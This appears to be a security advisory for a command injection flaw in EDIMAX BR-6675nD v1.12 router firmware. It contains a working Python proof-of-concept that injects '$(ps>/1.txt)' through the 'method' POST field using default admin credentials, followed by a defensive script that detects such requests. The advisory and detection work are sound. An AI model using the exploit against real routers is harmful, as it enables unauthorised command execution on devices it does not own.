Overview

Affected version

BR-6675nD v1.12

Vulnerability details

The EDIMAX BR-6675nD v1.12 firmware has a command injection vulnerability in the formEZCHNwlanSetup function. The v226 variable receives the method parameter from a POST request. Because the user controls this input and it is passed to system(), the call allows command injection.


POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {
    "apMode": "",
    "band": "",
    "wisp": "0",
    "autoMacClone": "",
    "ssid": "",
    "chan": "",
    "wlanMac": "",
    "wlLinkMac1": "",
    "wlLinkMac2": "",
    "wlLinkMac3": "",
    "wlLinkMac4": "",
    "wlLinkMac5": "",
    "wlLinkMac6": "",
    "method": payload,
    "submit-url": "/"
}
url = f'http://{ip}/goform/formEZCHNwlanSetup'

res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)
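
A detection check for the request shape shown above, as an added example that is not part of the original advisory: it flags POST bodies sent to /goform/formEZCHNwlanSetup whose method field contains shell metacharacters. The function names, the metacharacter set, the non-matching path and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory.
TARGET_PATH = "/goform/formEZCHNwlanSetup"
TAINTED_FIELD = "method"

# Assumption: characters a shell interprets when the value reaches system().
SHELL_META = re.compile(r"[$`;|&<>(){}\\\n\r'\"]")


def suspicious_fields(path, body, fields=(TAINTED_FIELD,)):
    """Return {field: value} for monitored form fields holding shell metacharacters.

    path is the logged request target; body is the urlencoded POST body.
    """
    if urlsplit(path).path.rstrip("/") != TARGET_PATH:
        return {}
    # parse_qs percent-decodes, so encoded metacharacters (%24, %28 ...) are caught too.
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in fields:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                hits[name] = value
    return hits


def scan(records):
    """records: iterable of (source_ip, path, body). Returns a list of alerts."""
    alerts = []
    for src, path, body in records:
        hits = suspicious_fields(path, body)
        if hits:
            alerts.append({"src": src, "path": path, "fields": hits})
    return alerts


# Constructed sample records (not captured traffic); the last path is hypothetical.
SAMPLE = [
    ("192.168.2.50", TARGET_PATH, "wisp=0&method=1&submit-url=%2F"),
    ("192.168.2.77", TARGET_PATH, "wisp=0&method=%24%28ps%3E%2F1.txt%29&submit-url=%2F"),
    ("192.168.2.77", "/goform/formOther", "method=%24%28ps%29"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The same character check can serve as an input filter on a reverse proxy placed in front of the device's management interface.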
